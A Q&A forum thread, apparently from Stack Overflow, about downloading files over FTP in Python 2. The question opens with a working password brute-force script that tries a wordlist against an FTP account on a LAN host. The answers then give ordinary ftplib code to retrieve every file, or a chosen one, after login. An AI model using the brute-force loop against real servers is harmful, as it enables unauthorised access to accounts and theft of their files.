# Retrieve file/s from FTP using Python connection

Tags: python, python-2.7, ftp

i built this simple tool to brute force and connect to the ftp server

```
import socket
import ftplib
from ftplib import FTP

port=21
ip="192.168.1.108"
file1="passwords"

try:
    s=socket.socket()
    s.connect((ip,port))
    print "port",port,"is open"
    moshe=open(file1,'r')
    for line in moshe.readlines():
        password=line.strip("\n")
        print password
        try:
            ftp = ftplib.FTP(ip)
            ftp.login("NINJA",password)
            print ("THE PASSWORD IS:",password)
            break
        except ftplib.error_perm:
            print "Incorrect"
    moshe.close()
except:
    print "port",port,"is closed"


ftp = FTP(ip)
ftp.login('NINJA',password)
print "File List:"
files = ftp.dir()
```

currently the tool works (i planted the right password 3rd on the file list) - when i log in i get this output:

```
port 21 is open
123
('THE PASSWORD IS:', '123')
File List:
drwxr-xr-x    2 0        0            4096 Jan 17 19:15 Folder
drwxr-xr-x    2 0        0            4096 Jan 17 19:12 Folder2
drwxr-xr-x    2 0        0            4096 Jan 17 19:16 Folder3
-rw-r--r--    1 0        0               0 Jan 17 21:42 blat.txt
-rw-r--r--    1 0        0             565 Jan 17 19:10 try.py
```

from here, what i want is to allow the user (me) to retrieve files either 1 specific file or all of them - but i do not know what is the simplest way to go about this

the choice itself of 1 or all, i can do, (press 1 to copy all ->) but the command itself to copy all or just one, and if one then based on what im not sure how to do.

EDIT:
adding what Xendrm suggested to the code yealds this:

```
Type a number for download or type 0 for all
0
downloading=> Folder
Traceback (most recent call last):
  File "/home/USER/aPython scripts/BRUT FTP.py", line 49, in <module>
    download(j)
  File "/home/USER/aPython scripts/BRUT FTP.py", line 44, in download
    ftp.retrbinary("RETR " + files[j],f)
  File "/usr/lib/python2.7/ftplib.py", line 406, in retrbinary
    conn = self.transfercmd(cmd, rest)
  File "/usr/lib/python2.7/ftplib.py", line 368, in transfercmd
    return self.ntransfercmd(cmd, rest)[0]
  File "/usr/lib/python2.7/ftplib.py", line 331, in ntransfercmd
    resp = self.sendcmd(cmd)
  File "/usr/lib/python2.7/ftplib.py", line 244, in sendcmd
    return self.getresp()
  File "/usr/lib/python2.7/ftplib.py", line 219, in getresp
    raise error_perm, resp
error_perm: 550 Failed to open file.
```

Comment: I think you need to build that command because it does not exist.

Answer (score 19, accepted):

ok so after much trial and error i found how to do it. - this script will take every file in the chosen directory - didn't figure out how to take all of the files from all of the sub directories as well, but this is more than good enough - will leave here for future people to see.

```
from ftplib import FTP
import os # allows me to use os.chdir

port=21
ip="192.168.1.108"
password='123'

os.chdir("c:/Users/USER/Desktop/new") #changes the active dir - this is where downloaded files will be saved to
ftp = FTP("192.168.1.108")
ftp.login('NINJA',password)
print "File List:"
files = ftp.dir()

directory ="/home/FTP" #dir i want to download files from, can be changed or left for user input
filematch = '*.*' # a match for any file in this case, can be changed or left for user to input

ftp.cwd(directory)

for filename in ftp.nlst(filematch): # Loop - looking for matching files
    fhandle = open(filename, 'wb')
    print 'Getting ' + filename #for confort sake, shows the file that's being retrieved
    ftp.retrbinary('RETR ' + filename, fhandle.write)
    fhandle.close()
```

and as proof, this is the output received from above code:

```
File List:
drwxr-xr-x    2 0        0            4096 Jan 17 19:15 Folder
drwxr-xr-x    2 0        0            4096 Jan 17 19:12 Folder2
drwxr-xr-x    2 0        0            4096 Jan 17 19:16 Folder3
-rw-r--r--    1 0        0               0 Jan 17 21:42 blat.txt
-rw-r--r--    1 0        0             565 Jan 17 19:10 try.py
Getting blat.txt
Getting try.py
```

Comment: what about hidden files ?  if I want delete hidden files, how i can take it full name ? the `ftp.retrlines("LIST -a")` command only show it

Comment: Thank you for this important contribution, you helped me a lot with your answer.

Answer (score 3):

First you need to understand the [ftp](http://www.w3.org/Protocols/rfc959/) protocol before doing some serious stuff. As an example you can do something like this:

```
from ftplib import FTP

port=21
ip="127.0.0.1"
password = "a@a.a"
user = "Anonymous"

ftp = FTP(ip)
ftp.login(user,password)

files = ftp.nlst()

for i,v in enumerate(files,1):
    print i,"->",v

i = int(raw_input("Type a number for download or type 0 for all\n"))

def f(s):
    #save the chuck of data in s
    print s

def download(j):
    print "downloading=>",files[j]
    ftp.retrbinary("RETR " + files[j],f)
    #or ftp.retrlines("RETR " + files[j],f) for ascii files

if i==0:
    for j in range(len(files)):
        download(j)
elif i>0 and i<=len(files):
    download(i-1)
```

Comment: when i try that i get multiple errors after the 0/# input, either way no matter what i input i get multiple errors, will update Original Post any second

Answer (score 1):

Try this :

```
import argparse
import os
from ftplib import FTP

def parse_args():
    ''' parse and check command line arguments '''
    ap = argparse.ArgumentParser(description="FTP Utility")
    ap.add_argument('-hh', dest='host', help="Host name")
    ap.add_argument('-u', dest='uname', help="user name")
    ap.add_argument('-p', dest='pwd', help="user password")
    ap.add_argument('-rd', dest='remote_dir', help="Path to remote directory")
    ap.add_argument('-ld', dest='local_dir', help="Path to local directory")
    ap.add_argument(dest='files', help="File names", nargs='+')
    return ap.parse_args()

def is_empty(file):
    file_size=os.stat(file).st_size
    if file_size == 0:
        print "The file {} is empty".format(file)
        return True
    return False

args=parse_args()

host_name=args.host
user_name=args.uname
user_pwd=args.pwd
remote_dir=args.remote_dir
local_dir=args.local_dir
files=args.files

ftp=FTP(host_name)
ftp.login(user_name, user_pwd)
ftp.cwd(remote_dir)

for file in files:
    try:
        local_filename = os.path.join(local_dir, file)
        print "Getting filename "+file
        ftp.retrbinary('RETR %s' % file, open(local_filename, 'wb').write)
        print "Saving at %s" % local_filename
    except Exception, err:
        print err
        if (is_empty(local_filename)):
            os.remove(local_filename)
        continue

ftp.quit()
```

I've been using this for a quite a while now. If you are regularly FTPing from one machine, just hard code the values for host_name, user_name, etc,.

Comment: It didn't work for me... not sure if I replace the values correctly. Was I supposed to change the values of dest in the parse_arg, right? thanks for your help